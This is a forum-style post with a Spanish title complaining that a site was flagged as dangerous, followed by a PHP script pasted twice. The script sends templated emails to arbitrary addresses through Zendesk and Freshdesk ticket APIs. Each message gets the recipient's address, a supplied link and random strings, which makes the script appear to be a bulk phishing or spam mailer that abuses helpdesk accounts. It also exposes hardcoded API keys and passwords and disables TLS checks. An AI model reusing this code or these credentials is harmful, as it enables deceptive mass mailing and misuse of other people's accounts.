Ayuda con sitio peligroso, mi sitio no es peligroso :(

<?php



$config = [

    "zen" => [

"domain" => "infotron",

        "key" => "bilgilendirme@infotron.com.tr",

        "secret" => "XFSbQczfm7OEv3elbCm43mQtD1LzogVjhHAhTj1c",

        "author" => "360000272999",

    ],

    "fresh" => [

        "domain" => "valleytigers",

        "key" => "AjBr6bU1FoqKcMO3s6",

        "secret" => 'cinders66',

        "config" => 80000000291,

    ],

];



$boundary = md5(time());

$eol = "\r\n";

$data = json_decode(file_get_contents("php://input"),true);



// Generated by curl-to-PHP: http://incarnate.github.io/curl-to-php/

if(!is_email($data["email"])){

    echo("Incorrect Email");

    exit();

}



$data["title"] = preg_replace("/([^@]*).*/", "$1", $data['email']);



$resp = [];



$data["content"] = formats($data['letter'],$data);



$api = $config[$data["router"]];



switch ($data["router"]) {

    case "zen":

        $resp = request("https://{$api['domain']}.zendesk.com/api/v2/tickets", json_encode([

            "ticket" => [

                "status" => "new",

                "problem_id" => "",

                "group_id" => "",

                "assignee_id" => "",

                "priority"=>"normal",

                "tags" => [],

                "via" => [

                    "channel" => "Web form"

                ],

                "followers" => [],

                "email_ccs" => [],

                "submitter_id" => 416158848274,

                "requester" => [

                    "name" => $data["title"],

                    "email" => $data["email"],

                ],

                "custom_fields" => [],

                "comment" => [

                    "html_body" => $data["content"],

                    "public" => true,

                    "author_id" => $api["author"],

                    "uploads" => []

                ],

                "subject" => $data["subject"]

            ]

        ]), [

            "Content-Type: application/json; charset=UTF-8",

        ], "{$api['key']}/token:{$api['secret']}");

        break;

    case "fresh":

        $message  = '--' . $boundary . $eol;

        $message .= 'Content-Disposition: form-data; name="email"' . $eol . $eol;

        $message .= $data["email"] . $eol;

        $message .= '--' . $boundary . $eol;

        $message .= 'Content-Disposition: form-data; name="subject"' . $eol . $eol;

        $message .= $data["subject"] . $eol;

        $message .= '--' . $boundary . $eol;

        $message .= 'Content-Disposition: form-data; name="priority"' . $eol . $eol;

        $message .= "2" . $eol;

        $message .= '--' . $boundary . $eol;

        $message .= 'Content-Disposition: form-data; name="status"' . $eol . $eol;

        $message .= "2" . $eol;

        $message .= '--' . $boundary . $eol;

        $message .= 'Content-Disposition: form-data; name="description"' . $eol . $eol;

        $message .= $data["content"] . $eol;

        $message .= '--' . $boundary . $eol;

        $message .= 'Content-Disposition: form-data; name="email_config_id"' . $eol . $eol;

        $message .= $api["config"] . $eol;

        $message .= "--" . $boundary . "--" . $eol . $eol;



        $resp = request("https://{$api['domain']}.freshdesk.com/api/v2/tickets/outbound_email", $message,[

            "Content-Type: multipart/form-data; boundary=".$boundary,

        ], "{$api['key']}:{$api['secret']}");

        break;

}



echo json_encode(array_merge($data,$resp));



//##########################################################################################



function is_email($input) {

  $email_pattern = "/^([a-zA-Z0-9\-\_\.]{1,})+@+([a-zA-Z0-9\-\_\.]{1,})+\.+([a-z]{2,4})$/i";

  if(preg_match($email_pattern, $input)) return TRUE;

}



function formats($text,$data) {

    $listing = [

        "[-time-]" => date("m/d/Y h:i:s a", time()),

        "[-email-]" => $data['email'],

        "[-emailuser-]" => $data['title'],

        "[-link-]" => $data['link'],

        "[-letters-]" => randString("abcdefghijklmnopqrstuvwxyz", 8, 15),

        "[-string-]" => randString("abcdefghijklmnopqrstuvwxyz0123456789", 8, 15),

        "[-number-]" => randString("0123456789", 7, 15),

        "[-md5-]" => md5(rand()),

    ];



    foreach ($listing as $search => $value) {

        $text = str_replace($search, $value, $text);

    }



    return $text;

}



function request ($url,$body,$head,$auth) {

    $resp = [];



    $ch = curl_init();

    curl_setopt($ch, CURLOPT_URL, $url);

    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

    curl_setopt($ch, CURLOPT_POSTFIELDS,$body);

    curl_setopt($ch, CURLOPT_POST, 1);

    curl_setopt($ch, CURLOPT_ENCODING, "gzip, deflate");



    curl_setopt($ch, CURLOPT_HTTPHEADER, $head);

    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);

    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);



    if ($auth!=":")

        curl_setopt($ch, CURLOPT_USERPWD, $auth);



    $result = curl_exec($ch);

    if (curl_errno($ch)) {

        $resp["error"] = curl_error($ch);

    }

    curl_close($ch);



    $resp["result"] = json_decode($result);



    return $resp;

}



function stringInsert($str,$insertstr,$pos) {

    $str = substr($str, 0, $pos) . $insertstr . substr($str, $pos);

    return $str;

}



function randString($consonants, $min_length, $max_length) {

    $length=rand($min_length, $max_length);

    $password = "";

    for ($i = 0; $i < $length; $i++) {

            $password .= $consonants[(rand() % strlen($consonants))];

    }

    return $password;

}

<?php



$config = [

    "zen" => [

"domain" => "infotron",

        "key" => "bilgilendirme@infotron.com.tr",

        "secret" => "XFSbQczfm7OEv3elbCm43mQtD1LzogVjhHAhTj1c",

        "author" => "360000272999",

    ],

    "fresh" => [

        "domain" => "valleytigers",

        "key" => "AjBr6bU1FoqKcMO3s6",

        "secret" => 'cinders66',

        "config" => 80000000291,

    ],

];



$boundary = md5(time());

$eol = "\r\n";

$data = json_decode(file_get_contents("php://input"),true);



// Generated by curl-to-PHP: http://incarnate.github.io/curl-to-php/

if(!is_email($data["email"])){

    echo("Incorrect Email");

    exit();

}



$data["title"] = preg_replace("/([^@]*).*/", "$1", $data['email']);



$resp = [];



$data["content"] = formats($data['letter'],$data);



$api = $config[$data["router"]];



switch ($data["router"]) {

    case "zen":

        $resp = request("https://{$api['domain']}.zendesk.com/api/v2/tickets", json_encode([

            "ticket" => [

                "status" => "new",

                "problem_id" => "",

                "group_id" => "",

                "assignee_id" => "",

                "priority"=>"normal",

                "tags" => [],

                "via" => [

                    "channel" => "Web form"

                ],

                "followers" => [],

                "email_ccs" => [],

                "submitter_id" => 416158848274,

                "requester" => [

                    "name" => $data["title"],

                    "email" => $data["email"],

                ],

                "custom_fields" => [],

                "comment" => [

                    "html_body" => $data["content"],

                    "public" => true,

                    "author_id" => $api["author"],

                    "uploads" => []

                ],

                "subject" => $data["subject"]

            ]

        ]), [

            "Content-Type: application/json; charset=UTF-8",

        ], "{$api['key']}/token:{$api['secret']}");

        break;

    case "fresh":

        $message  = '--' . $boundary . $eol;

        $message .= 'Content-Disposition: form-data; name="email"' . $eol . $eol;

        $message .= $data["email"] . $eol;

        $message .= '--' . $boundary . $eol;

        $message .= 'Content-Disposition: form-data; name="subject"' . $eol . $eol;

        $message .= $data["subject"] . $eol;

        $message .= '--' . $boundary . $eol;

        $message .= 'Content-Disposition: form-data; name="priority"' . $eol . $eol;

        $message .= "2" . $eol;

        $message .= '--' . $boundary . $eol;

        $message .= 'Content-Disposition: form-data; name="status"' . $eol . $eol;

        $message .= "2" . $eol;

        $message .= '--' . $boundary . $eol;

        $message .= 'Content-Disposition: form-data; name="description"' . $eol . $eol;

        $message .= $data["content"] . $eol;

        $message .= '--' . $boundary . $eol;

        $message .= 'Content-Disposition: form-data; name="email_config_id"' . $eol . $eol;

        $message .= $api["config"] . $eol;

        $message .= "--" . $boundary . "--" . $eol . $eol;



        $resp = request("https://{$api['domain']}.freshdesk.com/api/v2/tickets/outbound_email", $message,[

            "Content-Type: multipart/form-data; boundary=".$boundary,

        ], "{$api['key']}:{$api['secret']}");

        break;

}



echo json_encode(array_merge($data,$resp));



//##########################################################################################



function is_email($input) {

  $email_pattern = "/^([a-zA-Z0-9\-\_\.]{1,})+@+([a-zA-Z0-9\-\_\.]{1,})+\.+([a-z]{2,4})$/i";

  if(preg_match($email_pattern, $input)) return TRUE;

}



function formats($text,$data) {

    $listing = [

        "[-time-]" => date("m/d/Y h:i:s a", time()),

        "[-email-]" => $data['email'],

        "[-emailuser-]" => $data['title'],

        "[-link-]" => $data['link'],

        "[-letters-]" => randString("abcdefghijklmnopqrstuvwxyz", 8, 15),

        "[-string-]" => randString("abcdefghijklmnopqrstuvwxyz0123456789", 8, 15),

        "[-number-]" => randString("0123456789", 7, 15),

        "[-md5-]" => md5(rand()),

    ];



    foreach ($listing as $search => $value) {

        $text = str_replace($search, $value, $text);

    }



    return $text;

}



function request ($url,$body,$head,$auth) {

    $resp = [];



    $ch = curl_init();

    curl_setopt($ch, CURLOPT_URL, $url);

    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

    curl_setopt($ch, CURLOPT_POSTFIELDS,$body);

    curl_setopt($ch, CURLOPT_POST, 1);

    curl_setopt($ch, CURLOPT_ENCODING, "gzip, deflate");



    curl_setopt($ch, CURLOPT_HTTPHEADER, $head);

    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);

    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);



    if ($auth!=":")

        curl_setopt($ch, CURLOPT_USERPWD, $auth);



    $result = curl_exec($ch);

    if (curl_errno($ch)) {

        $resp["error"] = curl_error($ch);

    }

    curl_close($ch);



    $resp["result"] = json_decode($result);



    return $resp;

}



function stringInsert($str,$insertstr,$pos) {

    $str = substr($str, 0, $pos) . $insertstr . substr($str, $pos);

    return $str;

}



function randString($consonants, $min_length, $max_length) {

    $length=rand($min_length, $max_length);

    $password = "";

    for ($i = 0; $i < $length; $i++) {

            $password .= $consonants[(rand() % strlen($consonants))];

    }

    return $password;

}